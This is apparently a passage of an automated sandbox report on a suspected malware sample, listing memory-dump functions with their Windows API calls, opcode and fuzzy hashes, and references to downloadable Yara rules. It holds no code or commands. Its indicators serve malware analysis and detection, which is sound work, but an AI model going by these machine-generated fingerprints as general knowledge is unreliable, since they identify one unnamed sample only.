String ID:
API String ID: 1029625771-0
Opcode ID: 7ba921db526c171658c97297e1b7744cc6b600daabeabe5e70dffd7b8b53674e
Instruction ID: 7657e15bc94093676598119dec016702c74205538c97aa6d138c99b9d8e47f22
Opcode Fuzzy Hash: 7ba921db526c171658c97297e1b7744cc6b600daabeabe5e70dffd7b8b53674e
Instruction Fuzzy Hash: CE91CFB21382931ECF2615B05C597FD3B99CBD2B14F4849A9C8D60F45CC796928FC761

Uniqueness

Uniqueness Score: -1.00%

Function 02221EC8, Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffddb3fdb25ad5d2aedf2d8f37f8e2ab159ecabcba71ee1bd920abe7700e98cd
Instruction ID: 73919d4f46c033023deca0457340bf23c03b88a2bd23de28e11f0639930b23fd
Opcode Fuzzy Hash: ffddb3fdb25ad5d2aedf2d8f37f8e2ab159ecabcba71ee1bd920abe7700e98cd
Instruction Fuzzy Hash: F49119E21780E61D8F470A306C6E1F9BF5CCBD6C1674CA9D881E20F919D687639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221371B, Relevance: 1.8, APIs: 1, Instructions: 316libraryCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF
LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 69866f4c9840c06af5655cf5b308fbaab11ed6fa151b78225f69c96e7c5ec97c
Instruction ID: 3af32b1783caf288352a464ffbb865c862819bfb832617b8753e32c88c6a065c
Opcode Fuzzy Hash: 69866f4c9840c06af5655cf5b308fbaab11ed6fa151b78225f69c96e7c5ec97c
Instruction Fuzzy Hash: 8691BDB21382921ECF2619B05C997FD7B99CB92F14F0889A9C4D60F858C796928FC761

Uniqueness

Uniqueness Score: -1.00%

Function 02213851, Relevance: 1.8, APIs: 1, Instructions: 308libraryCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF
LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 1af7f6b4d8de7692e170a4e99b6e8dcebe1c8d6e03328ababd2e0d8b8c622aa8
Instruction ID: 66639c5a6a96bb2520122c39dfc141f08b4fce6686c395b8907ecb47b00a4784
Opcode Fuzzy Hash: 1af7f6b4d8de7692e170a4e99b6e8dcebe1c8d6e03328ababd2e0d8b8c622aa8
Instruction Fuzzy Hash: A491CEB21382921ECF2615B05C5D7FD7B99CB92F14F0C89A9C4D60F858C796928FC761

Uniqueness

Uniqueness Score: -1.00%

Function 02213AD5, Relevance: 1.8, APIs: 1, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f22d661116adefa775a8a001cf7f580853d780c52f88bee6ed61eac822154973
Instruction ID: b49930db007f1cf5935e3ee7830e4cae20af724e47616684f159dd0afd0d933c
Opcode Fuzzy Hash: f22d661116adefa775a8a001cf7f580853d780c52f88bee6ed61eac822154973
Instruction Fuzzy Hash: DC817AB21382961ECF2619705C697FD7B9DCBD2B14F488998C4D20F558C796A28FC361

Uniqueness

Uniqueness Score: -1.00%

Function 02213C16, Relevance: 1.8, APIs: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 2ec02b187a60b72aeb252a3a6b82013aa641652eac26c0edd2381a0cfcb53fa1
Instruction ID: c23b2e8fcd4eaac7362a40286da9169556eeb0bf01b3c35093f18acca4d65d05
Opcode Fuzzy Hash: 2ec02b187a60b72aeb252a3a6b82013aa641652eac26c0edd2381a0cfcb53fa1
Instruction Fuzzy Hash: A48189B21382D61ECF1619709C6D7FD7B9DCBD2A14F088998C4D20F958C796A28FC761

Uniqueness

Uniqueness Score: -1.00%

Function 02213D7E, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 3e5ea2a8983efc87950238f1ecc566e511b64cd6026394453f79cef46badad44
Instruction ID: 4cfc7bfc7f629a6e15161465e6ee0d03cd4b3cd0314b521d07a3f17b6f84abcf
Opcode Fuzzy Hash: 3e5ea2a8983efc87950238f1ecc566e511b64cd6026394453f79cef46badad44
Instruction Fuzzy Hash: 897165B21382921ECF1619709C6E7FD7B9DCBD2A15F4C8998C4D60F958C796A28FC360

Uniqueness

Uniqueness Score: -1.00%

Function 02213ECC, Relevance: 1.7, APIs: 1, Instructions: 245COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 95949fef1ba347dd75ef590ff6b23199eecfdfb869c85d013a9bad9a9e3bc29f
Instruction ID: df60303887d08f8c87608537e6f21ae0b450ea9599e50f160ef53bb836f023ea
Opcode Fuzzy Hash: 95949fef1ba347dd75ef590ff6b23199eecfdfb869c85d013a9bad9a9e3bc29f
Instruction Fuzzy Hash: FF7156B21382D21ECF170570A86E7FD7F99CB92A15F4C8998C4D50F858C786A28FC361

Uniqueness

Uniqueness Score: -1.00%

Function 02214120, Relevance: 1.7, APIs: 1, Instructions: 239COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 21e3967a21f9428d8066bb00bc6501883b475f94139952c5a435d4a91533842e
Instruction ID: 1816489921ba1a75b64fdb046b6064a7326ba5fd2272615b60ae5c75b42f6e8c
Opcode Fuzzy Hash: 21e3967a21f9428d8066bb00bc6501883b475f94139952c5a435d4a91533842e
Instruction Fuzzy Hash: 0C6136B21382D60ECF161570686E3FD7B99CB92E15F4C9998C4D20F958C786A28FC3A0

Uniqueness

Uniqueness Score: -1.00%

Function 02214018, Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 49bac868b6c991e98beabca9c5b417c3a577257beb6bd231c7c80801b7969652
Instruction ID: 74fd4732b853ca9cdf31fab1d1bbedba681e3b83546432227639b146d95672c4
Opcode Fuzzy Hash: 49bac868b6c991e98beabca9c5b417c3a577257beb6bd231c7c80801b7969652
Instruction Fuzzy Hash: C86148B21382D61ECF16157058AE3FD7B99CB92A15F4C89A8C4D20F958C786A38FC361

Uniqueness

Uniqueness Score: -1.00%

Function 02214260, Relevance: 1.7, APIs: 1, Instructions: 222COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: b4d7f6b19c1ac55ae0ce76612b410ccb525f01b9c4e69efb1d5428ecf2f02dc8
Instruction ID: 6688dfa37a2efb97f5d8e250dd184de03c28efba78e54df2c17c44a25217c730
Opcode Fuzzy Hash: b4d7f6b19c1ac55ae0ce76612b410ccb525f01b9c4e69efb1d5428ecf2f02dc8
Instruction Fuzzy Hash: 5D5126B21382D61ECF16057058AE3FD7B99CB92E15F4C9998C4D10F958C786A28FD3A1

Uniqueness

Uniqueness Score: -1.00%

Function 02214384, Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 4edd2f8d79cd7c4d9f127c83be291fd984cae4ad4a88b1e363ee5600cfa3b06a
Instruction ID: ed20b48b456d1453ca49fa28315f9633f086a228566d5419d6229e9729014f81
Opcode Fuzzy Hash: 4edd2f8d79cd7c4d9f127c83be291fd984cae4ad4a88b1e363ee5600cfa3b06a
Instruction Fuzzy Hash: 7F5106B21382D61ECF160570686E2FD7F98CB92E15F4C9998C4E10F918C787A39F93A1

Uniqueness

Uniqueness Score: -1.00%

Function 02213A9B, Relevance: 1.7, APIs: 1, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 46ff9973e40e247546e59a255deb4feef0bb0b3e30badccad4d0b4343fbe3a68
Instruction ID: c2eada779d8f045714bbd3acbbae6e76105aa342d9274adb848876acca9e799f
Opcode Fuzzy Hash: 46ff9973e40e247546e59a255deb4feef0bb0b3e30badccad4d0b4343fbe3a68
Instruction Fuzzy Hash: E951CC31934362B7DF383AD48884FFD11E75F21724F64452AEC8A974DCC7668889CA23

Uniqueness

Uniqueness Score: -1.00%

Function 0221476E, Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 658f27ff084f3018ce17aae52b95399409fc10fa7c78f19d9dc11652ffccf36d
Instruction ID: a7ac955658bc13b0e010a70bf736531c7049bb2d96fbee0d83da9aed0d62b265
Opcode Fuzzy Hash: 658f27ff084f3018ce17aae52b95399409fc10fa7c78f19d9dc11652ffccf36d
Instruction Fuzzy Hash: 40519DA21781C60DCF030930686E2F9BF9CCBD6D16F4C9998C5E10F959C786639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 022148B5, Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ba01f3fba1571d7104a3c093c559753c3c62ee88860c4e1da48f4d38502c3522
Instruction ID: 33bf69464ba8fbc7585b1b64e8143f253a1687d2c3d9affce23cc8990b3790a1
Opcode Fuzzy Hash: ba01f3fba1571d7104a3c093c559753c3c62ee88860c4e1da48f4d38502c3522
Instruction Fuzzy Hash: 28418CE21781D60DCF070930686E2F9BF9CCBD2D16B4CA9D881E10F959C786638F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 022149F4, Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: b20cd262da816ba060ac9e3ce08996608fea547a852c313acc63478db139b98c
Instruction ID: 4002ea34c26485f8d6bdfb973230bde7f1f7c28e9648234135e6116959b07c80
Opcode Fuzzy Hash: b20cd262da816ba060ac9e3ce08996608fea547a852c313acc63478db139b98c
Instruction Fuzzy Hash: 29412CE21780D60DCF470930686E2F9BF9CCBD6D16B4CA9D881E10F919D786639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222442C, Relevance: 1.6, APIs: 1, Instructions: 141libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b7378b29d93878d9b743b9151ec96a1086ed9637f8962f18d436c8eb7f4eaa6
Instruction ID: 9ef88bcef6d5deaaf60cef27197816cfe6912475eef5705ec9ade70e9e2e8bdf
Opcode Fuzzy Hash: 6b7378b29d93878d9b743b9151ec96a1086ed9637f8962f18d436c8eb7f4eaa6
Instruction Fuzzy Hash: E24139E21780E60D8F471A30686E0F9BF5CCBD6C1674CA9D8C1E20F919D687639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 02214B3B, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a2ea52dabd0024fe3f40309efffc78413b3d8766d4c5ce7ee891a58353befa85
Instruction ID: 8114b8a3e73240399aaf16bf0ab1ad3c6f209153babb02a378b25fa3680211ac
Opcode Fuzzy Hash: a2ea52dabd0024fe3f40309efffc78413b3d8766d4c5ce7ee891a58353befa85
Instruction Fuzzy Hash: 5941FCF21780D60E8F470A30686E1F9BF6CCBD6D1674CA9D881E10F915D78A639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 02214C65, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 4184b4704a8b719ccef0bf7a11d4afec276bcf336faf36f02cba8a258a690c15
Instruction ID: c26f1d004430d93f4b1b8707c68a32ed70e7e2aaed3ee2cba4bf1f6c853fa163
Opcode Fuzzy Hash: 4184b4704a8b719ccef0bf7a11d4afec276bcf336faf36f02cba8a258a690c15
Instruction Fuzzy Hash: 0B4197E21780D60D8F470930686E1FDBF5CCBD6C1674CA9D881E10FA59D78A639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 022247AA, Relevance: 1.6, APIs: 1, Instructions: 126libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5dc4611e3b7db494e3ebb0ea7748d7f8bcda09da0ee9200efa6698bfd31089e2
Instruction ID: 7d1c2e44fd23262634a4d20eee752918ab3c826ec1b6ce04bc96de18e4a13fe5
Opcode Fuzzy Hash: 5dc4611e3b7db494e3ebb0ea7748d7f8bcda09da0ee9200efa6698bfd31089e2
Instruction Fuzzy Hash: 4C3135E21780E60E4F471A30786E0F9BF5CCBD6C1634CA9D891F10F919DA86639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221A292, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06909bd8fd335c29ffc45338f5613b0a16ef217aec38b980c0dc4013ee768d5d
Instruction ID: 31114129442262ef3090933a99d3f38f07a3d4b727e7e8853103493c6b31a7c0
Opcode Fuzzy Hash: 06909bd8fd335c29ffc45338f5613b0a16ef217aec38b980c0dc4013ee768d5d
Instruction Fuzzy Hash: CE411FB0531311AFEB15AFA4CC88BB93366EF00364F504211E8668B1ADCBB18984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0221D008, Relevance: 1.6, APIs: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(022211C1,80000000,00000001,00000000,00000003,00000000,00000000,0221CE9D,00000000,0221D25D,02212696,00000000,000000FE,00000011,00000000,00000000), ref: 0221D120

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 20e60cb510230c9e744d2955df4448caadd384f8f5f1674ee1f26e366858ae3c
Instruction ID: 0392be5f9984a932b1560fa56b6a210c6a92d891324e0da862abaeef529d4b39
Opcode Fuzzy Hash: 20e60cb510230c9e744d2955df4448caadd384f8f5f1674ee1f26e366858ae3c
Instruction Fuzzy Hash: B33184E21780D60D8F4706306C6E1F9BF5CC7D6C1674CA9D881E10F915DA86639F93B4

Uniqueness

Uniqueness Score: -1.00%

Function 02211BB0, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

EnumWindows.USER32(02211F78,?,00000000,02221409,022211C1), ref: 02211D15

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 68d825d94b65d2aaf8b22f8379c01c3499c7261203fde0660def54cdb39d3041
Instruction ID: e47de5e6fe67c31fd2a8bb33e90a8640eae004907af8e0dc7fe4f27d6bc0196b
Opcode Fuzzy Hash: 68d825d94b65d2aaf8b22f8379c01c3499c7261203fde0660def54cdb39d3041
Instruction Fuzzy Hash: 0C217470A38315EFDB10AFF48C50FF936D6AB69754F204326BD168B2CCD6B08445CA52

Uniqueness

Uniqueness Score: -1.00%

Function 022145D6, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF
LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: ed695b19f1d58dffeec1c9be880610fad4a15295947baa8547fc691c88ab461a
Instruction ID: 2620190f14b76fd63a33c5c9d1888b2e86544d3e967982d555f56faf45a9060d
Opcode Fuzzy Hash: ed695b19f1d58dffeec1c9be880610fad4a15295947baa8547fc691c88ab461a
Instruction Fuzzy Hash: C931DC30434357BBCF3829D488C4BBD25D35F21718F64862ADC8A964ECC7678989CD13

Uniqueness

Uniqueness Score: -1.00%

Function 0221473E, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034cf61d76e17845cd6d9da2fe9d6d97ab749c7b0f7cdb872c88a8a94401a32d
Instruction ID: 185cea0ead2d2780210ad6f39d8edb1e9670ab43d0096ec7fb4969334d4ac80d
Opcode Fuzzy Hash: 034cf61d76e17845cd6d9da2fe9d6d97ab749c7b0f7cdb872c88a8a94401a32d
Instruction Fuzzy Hash: 86217930528345EADF306AA08844FFD26D75F62324F60821AEC492A1CCCB7A9509C613

Uniqueness

Uniqueness Score: -1.00%

Function 022165AF, Relevance: 1.6, APIs: 1, Instructions: 77libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0221DC36: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 8540667dbe272335cd18261581f339408a374b8a38e91445812b5d558b1baf1f
Instruction ID: 7b44589001a16e8f61c9acfb06591d5360a2d35055f224eb38ec861acddd0be7
Opcode Fuzzy Hash: 8540667dbe272335cd18261581f339408a374b8a38e91445812b5d558b1baf1f
Instruction Fuzzy Hash: 541122306753A1BBEB203BE89C40FFD26079F50B50F244522F556AB1CDCAA74888CE5A

Uniqueness

Uniqueness Score: -1.00%

Function 022307F9, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7fb2e4d3d8471c54d01df7d16a1f81bab3523772bebbdf86593c63db60ffd421
Instruction ID: 43b11609e2b5d68a0929df4bc7bfc8601531e9b4b5f91df475059cff96380155
Opcode Fuzzy Hash: 7fb2e4d3d8471c54d01df7d16a1f81bab3523772bebbdf86593c63db60ffd421
Instruction Fuzzy Hash: E8F082505362F7B99E303EE5A884BFD5506CB11760F804A12F5679418CC7A3458CCD67

Uniqueness

Uniqueness Score: -1.00%

Function 02215E30, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 18081c58cf2641dd07f351feaf146445c1e287ac988177defbfefc30479aacdb
Instruction ID: cd779fd7258a99ba329645744acd29be60f3ba2da77175f473a78ed6190d3da5
Opcode Fuzzy Hash: 18081c58cf2641dd07f351feaf146445c1e287ac988177defbfefc30479aacdb
Instruction Fuzzy Hash: 8CF082504352B2B9DA303BE5A884BF95505CB11B60F904612F5639508C9BA3484CDD53

Uniqueness

Uniqueness Score: -1.00%

Function 02211CF6, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

EnumWindows.USER32(02211F78,?,00000000,02221409,022211C1), ref: 02211D15

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 52ad7f6eba441f27349af6f576f9a715917facdd047a0461868768d20297c1ad
Instruction ID: 4275f599ff3df511c6c905d59e1e31a1132909665e3f6a1ba56bc9566f25fd76
Opcode Fuzzy Hash: 52ad7f6eba441f27349af6f576f9a715917facdd047a0461868768d20297c1ad
Instruction Fuzzy Hash: F4F05C390283025FC910AAF58894F9423D09F7E3B0F300511D56ADA350CF30C155CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02224537, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 847daf43de4f4bc1372a25ec68a7498605fd89bde7d4b2597ecf101ba3465c9c
Instruction ID: 680e6bfd52958e55cabe9079a8a2f19fcdc1edc8ecfc840a8543e56df2fdcf48
Opcode Fuzzy Hash: 847daf43de4f4bc1372a25ec68a7498605fd89bde7d4b2597ecf101ba3465c9c
Instruction Fuzzy Hash: C6E06D504362F3BADA203FE5AC84BBD5501CB00B90F804A22F5629408CCA634488CE67

Uniqueness

Uniqueness Score: -1.00%

Function 0222464E, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 51e81b65b8b1af963d6966e9cb6197d1878956ddab9754e6ca8be7b76b1737e8
Instruction ID: 34bb9cb733f3c02215b7cb0eaf0f3cd1e7996e832f6328139ac29d5ddce82c6b
Opcode Fuzzy Hash: 51e81b65b8b1af963d6966e9cb6197d1878956ddab9754e6ca8be7b76b1737e8
Instruction Fuzzy Hash: B6E01A505353F7BADE243FF9A8947BCA202CB40790F804A22F5A79459CCB734988CE57

Uniqueness

Uniqueness Score: -1.00%

Function 0222478A, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2f915897785773b0281cdba4cfc4f293e14aaf214acb996bed8a219a86eae15e
Instruction ID: 30a4d97ca6f0beb0cae13778ce462baad0204717904b7b15b3199b150f7dd148
Opcode Fuzzy Hash: 2f915897785773b0281cdba4cfc4f293e14aaf214acb996bed8a219a86eae15e
Instruction Fuzzy Hash: 59D05E502753F6B79E203FF9B8D47BC6202DB40750F848A12F4AA9819CCE734848CE9B

Uniqueness

Uniqueness Score: -1.00%

Function 0221CFF5, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(022211C1,80000000,00000001,00000000,00000003,00000000,00000000,0221CE9D,00000000,0221D25D,02212696,00000000,000000FE,00000011,00000000,00000000), ref: 0221D120

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a1f8851d8e1371890f35e94a789048fdd5963c4451c8c4cff6d860a002bd67cd
Instruction ID: 07c55db7a1acb162eccd7a967e6f6abc81a04852bc7372a3e787a23cdf3a5cd5
Opcode Fuzzy Hash: a1f8851d8e1371890f35e94a789048fdd5963c4451c8c4cff6d860a002bd67cd
Instruction Fuzzy Hash: 65C04C717E4300F6F73486608D57F6661549B64F01F208419BF057C0C485F5A550C519

Uniqueness

